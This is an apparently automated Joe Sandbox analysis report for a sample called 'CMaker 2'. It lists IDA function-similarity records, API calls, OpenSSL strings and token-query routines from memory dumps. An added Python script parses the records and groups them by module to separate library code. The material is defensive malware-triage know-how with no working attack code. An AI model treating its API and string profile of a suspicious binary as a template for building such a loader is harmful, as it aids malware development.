                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                  • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                  • API String ID: 2895956056-699529898
                                                                                                                                                                                  • Opcode ID: 0ec6545137c218525aca36a5c69f06ebb26d0c39709c03294cc33139ca873a5f
                                                                                                                                                                                  • Instruction ID: 39d8d0078324366ea93cfb538059ad89458e2f92bd8e413e15ac5f602ef06f01
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ec6545137c218525aca36a5c69f06ebb26d0c39709c03294cc33139ca873a5f
                                                                                                                                                                                  • Instruction Fuzzy Hash: D7415372A08B8285EB20DB64F4952AA7361FB95364F944379E6BD837D5EF7CD0448B00
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                  • Opcode ID: c5270a4f35af077b5cb6a45d2d3941eb25c66998b702b56485634ee7620a4e43
                                                                                                                                                                                  • Instruction ID: e8b523ac4dc007905ad3982da40c624cfcfc8085b0101e87d1acf2e76bca7ef5
                                                                                                                                                                                  • Opcode Fuzzy Hash: c5270a4f35af077b5cb6a45d2d3941eb25c66998b702b56485634ee7620a4e43
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AD1A332A187428AEB60DF65D4843AD77A0FB46788F9001B5EE5D977DAEF78E081C740
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007C3420ErrorLast
                                                                                                                                                                                  • String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
                                                                                                                                                                                  • API String ID: 994887846-502574948
                                                                                                                                                                                  • Opcode ID: 4c2e6772690861a5a0206d813afd3d798138ea416ca04513dbf9d65ad58d7885
                                                                                                                                                                                  • Instruction ID: ce41e9b58a705feb2ad283f84f0f055a8fd66649c7678180fe4e39fc55b8f5e1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c2e6772690861a5a0206d813afd3d798138ea416ca04513dbf9d65ad58d7885
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B91A265B0C68281F6B1ABD1E4713BE67A8EF89780F800031EA5E67B96DF3CE501C714
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID:
• String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
• API String ID: 0-1087561517
• Opcode ID: d743759746665b7db7d4fba4d59fd9459b03d2bc73fc4485894cad057df26e57
• Instruction ID: 55d757bbae87fad5fe4c6fd928fded7c314bfa0736c1741609c8112309de9d43
• Opcode Fuzzy Hash: d743759746665b7db7d4fba4d59fd9459b03d2bc73fc4485894cad057df26e57
• Instruction Fuzzy Hash: 21D16C65B09A8341FBB1ABE2D5757F912AAAF48784F444032ED0DA7ACADE3DE505C310
Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID:
• String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
• API String ID: 0-2528746747
• Opcode ID: 8b118266c9bc1b67049e630281c5b4ce7d7592436c424047e13d220b9c20d5b8
• Instruction ID: 9b09d66797edd7fc86cbff5053c8c9adba8470037d83022dae4c0e69e27ffc93
• Opcode Fuzzy Hash: 8b118266c9bc1b67049e630281c5b4ce7d7592436c424047e13d220b9c20d5b8
• Instruction Fuzzy Hash: C6B1CD25F0868395FB31ABE1D8A01FD2BA9EF84788F504036D91D67A95DE3CE646C340
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC17D
• GetLastError.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC18B
• LoadLibraryExW.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC1B5
• FreeLibrary.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC223
• GetProcAddress.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC22F
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: e5c3313d4d9644a9ae338b272818f224d8465b9764fd00572b6e393a8b0d30f2
• Instruction ID: 538b4d270b647e6ecd5f18ba376c5c2695be891ff24fab5e14c221a676154de0
• Opcode Fuzzy Hash: e5c3313d4d9644a9ae338b272818f224d8465b9764fd00572b6e393a8b0d30f2
• Instruction Fuzzy Hash: 0431C361B0AA0285EF15DB42A8446756394BF0BBA4F9A45B5DD3EC73C1FF3CE9448341
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Opcode ID: ad401320b04244f1446b4500ec97eca793b1beecba4cdffe4afa79db84254f8d
• Instruction ID: 38e3965ec0dceb2b969462d85f5543efb11a0461e5708e0d7f90792d12168cf7
• Opcode Fuzzy Hash: ad401320b04244f1446b4500ec97eca793b1beecba4cdffe4afa79db84254f8d
• Instruction Fuzzy Hash: A0217F71A0C64242EB109B55E49023AA3A0FF967A4F9482B5EABDC3AE4EF7CD4548700
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 2d7e9b92152e969ab98a5bc7bfa55def46723a2a205e91dfbdb8d38609dd549d
• Instruction ID: 901a0e3403c2e3a2ec85c7015842460940c5dfd772f390522d697e747fe581b6
• Opcode Fuzzy Hash: 2d7e9b92152e969ab98a5bc7bfa55def46723a2a205e91dfbdb8d38609dd549d
• Instruction Fuzzy Hash: 1121A12CB2E68241FB5CA7B1565113952524F967B0F9C47BCE93EC76D6FE2CB4108200
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: cde044b729814a6b4b389e6e013c9bdbf801f90403088e59f1e1d6a2ccecc8e7
• Instruction ID: ac7526796cc28ec7220d2e8a25e4bca853cbd9ca9e020d392f39f8e1510f68a9
• Opcode Fuzzy Hash: cde044b729814a6b4b389e6e013c9bdbf801f90403088e59f1e1d6a2ccecc8e7
• Instruction Fuzzy Hash: 52118B61B18A4586E7508B02E854339B2B0FB98BE4F008274EA7EC77E4EF7CD905C740
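The function-similarity records above carry two things an analyst wants to pull out quickly: which memory-dump module each function belongs to (the `Offset:` value on the Source File line), and what the function's API set and embedded strings say about it. In this sample the strings `..\s\ssl\statem\extensions_srvr.c`, `..\s\ssl\ssl_rsa.c` and the names `tls_construct_stoc_cookie`, `SSL_CTX_use_serverinfo_file` and `tls_process_new_session_ticket` are OpenSSL's own source files and function names, so the module at 00007FFD935A0000 is an OpenSSL library image loaded into process 5, while the module at 00007FF6FABE0000 contains the LoadLibraryExW/GetProcAddress resolver (with the `api-ms-` string), a token query and console-write helpers. The script below is an added example, not part of the Joe Sandbox report: it parses records in the report's text format from a constructed excerpt of the entries above, groups them by module base, and tags each function. The tag names and the `SAMPLE` excerpt are my own constructions.

```python
"""Parse Joe Sandbox function-similarity records and triage them by module.

Added example; the record layout follows the report text above, the SAMPLE
excerpt is constructed from three of those records, and the tag names are
the author's own choice.
"""
import re
from collections import defaultdict

# Constructed excerpt in the report's own line format (three records, trimmed).
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID:
• String ID: ..\\s\\ssl\\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
• API String ID: 0-2528746747
• Instruction Fuzzy Hash: C6B1CD25F0868395FB31ABE1D8A01FD2BA9EF84788F504036D91D67A95DE3CE646C340
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF6FABEC3AA), ref: 00007FF6FABEC17D
• GetLastError.KERNEL32(?,?,?,00007FF6FABEC3AA), ref: 00007FF6FABEC18B
• FreeLibrary.KERNEL32(?,?,?,00007FF6FABEC3AA), ref: 00007FF6FABEC223
• GetProcAddress.KERNEL32(?,?,?,00007FF6FABEC3AA), ref: 00007FF6FABEC22F
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Instruction Fuzzy Hash: 0431C361B0AA0285EF15DB42A8446756394BF0BBA4F9A45B5DD3EC73C1FF3CE9448341
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Instruction Fuzzy Hash: A0217F71A0C64242EB109B55E49023AA3A0FF967A4F9482B5EABDC3AE4EF7CD4548700
"""

# "• Func.MODULE(args), ref: ADDR" lines listed under an "APIs" header.
API_CALL = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
# Generic "• Key: value" lines (Source File, API ID, String ID, ...).
FIELD = re.compile(r"^• ([^:]+): ?(.*)$")
# Build-path fragments such as ..\s\ssl\ssl_rsa.c embedded in the binary.
SOURCE_PATH = re.compile(r"[\w.\\/-]+\.(?:c|cpp|h)\b")


def parse_records(text):
    """Split report text into one dict per function; a record ends at its
    'Instruction Fuzzy Hash' line, which is the last field Joe Sandbox prints."""
    records, cur = [], {"apis": [], "strings": []}
    for raw in text.splitlines():
        line = raw.strip()
        m = API_CALL.match(line)  # must be tried before FIELD (it also has a colon)
        if m:
            cur["apis"].append({"func": m.group(1), "module": m.group(2), "ref": m.group(4)})
            continue
        m = FIELD.match(line)
        if not m:
            continue
        key, val = m.group(1), m.group(2).strip()
        if key == "Source File":
            sdmp, _, rest = val.partition(", Offset: ")
            cur["source_file"] = sdmp
            cur["module_base"] = int(rest.split(",")[0], 16)
        elif key == "API ID":
            cur["api_id"] = val
        elif key == "String ID":
            cur["strings"] = [s for s in val.split("$") if s]
        elif key == "Instruction Fuzzy Hash":
            cur["fuzzy"] = val
            records.append(cur)
            cur = {"apis": [], "strings": []}
    return records


def triage(record):
    """Tag one function from its resolved API calls, API ID and strings.
    Tag names are the author's own; the 'api-ms-' + LoadLibrary/GetProcAddress
    combination is consistent with CRT API-set probing, which the analyst
    should confirm by looking at the function itself."""
    tags = set()
    api_names = {a["func"] for a in record["apis"]}
    if any(n.startswith("LoadLibrary") for n in api_names) and "GetProcAddress" in api_names:
        tags.add("dynamic-api-resolution")
    if "Token" in record.get("api_id", ""):
        tags.add("token-query")
    if any(SOURCE_PATH.search(s) and "\\ssl\\" in s for s in record["strings"]):
        tags.add("openssl-source-path")
    return tags


def summarize(records):
    """Group functions by module base, unioning tags and embedded source paths."""
    by_module = defaultdict(lambda: {"functions": 0, "tags": set(), "source_paths": set()})
    for r in records:
        entry = by_module[r.get("module_base")]
        entry["functions"] += 1
        entry["tags"] |= triage(r)
        for s in r["strings"]:
            m = SOURCE_PATH.search(s)
            if m:
                entry["source_paths"].add(m.group(0))
    return dict(by_module)


if __name__ == "__main__":
    for base, info in sorted(summarize(parse_records(SAMPLE)).items()):
        print(f"{base:016X}: {info['functions']} function(s) "
              f"tags={sorted(info['tags'])} paths={sorted(info['source_paths'])}")
```

Run against the full report text, the module summary is a quick way to separate statically identifiable library code (here, OpenSSL, which matches the PyInstaller bundle flagged in the signatures) from the functions that actually deserve a look in the dump.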
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: 00007B22408
• String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
• API String ID: 4199793457-1635961163
• Opcode ID: a8ee6e3859b99f2b17f28d4ce1b69a439d2afc43d39ac9c6cf93f3c5d709489f
• Instruction ID: 4214e480a4b4ab11cf03eef332da5b06e75f6437bd2c824c4cb34c27c25ec7f8
• Opcode Fuzzy Hash: a8ee6e3859b99f2b17f28d4ce1b69a439d2afc43d39ac9c6cf93f3c5d709489f
                                                                                                                                                                                  • Instruction Fuzzy Hash: A502D572B086C281F7708B96E4A13BD77A8EB85B84F048035DAADA7795DF3CE591C700
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: GetCurrentProcess.KERNEL32 ref: 00007FF6FABE6D40
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: OpenProcessToken.ADVAPI32 ref: 00007FF6FABE6D53
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: GetTokenInformation.ADVAPI32 ref: 00007FF6FABE6D78
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: GetLastError.KERNEL32 ref: 00007FF6FABE6D82
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: GetTokenInformation.ADVAPI32 ref: 00007FF6FABE6DC2
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6FABE6DDE
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: CloseHandle.KERNEL32 ref: 00007FF6FABE6DF6
                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,00007FF6FABE2A89), ref: 00007FF6FABE751C
                                                                                                                                                                                  • LocalFree.KERNEL32 ref: 00007FF6FABE7525
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                  • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                  • API String ID: 6828938-1529539262
                                                                                                                                                                                  • Opcode ID: 5e81501040e639016633110d7dcf39a24e93b3ab722f428aa23c19e56a2a7eac
                                                                                                                                                                                  • Instruction ID: b992a89898bb565822ee14b12bf8dcc684925b86b11fbfce38b7434a957f9b2c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e81501040e639016633110d7dcf39a24e93b3ab722f428aa23c19e56a2a7eac
                                                                                                                                                                                  • Instruction Fuzzy Hash: FD215C71A1864282FB10AB10E8553FA62A5EF89780F8494B5EA6EC37D6FF3CD944C740
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAE57
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAE8D
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAEBA
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAECB
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAEDC
                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012,?,?,?,?,00007FF6FABF6F2B), ref: 00007FF6FABFAEF7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2506987500-0
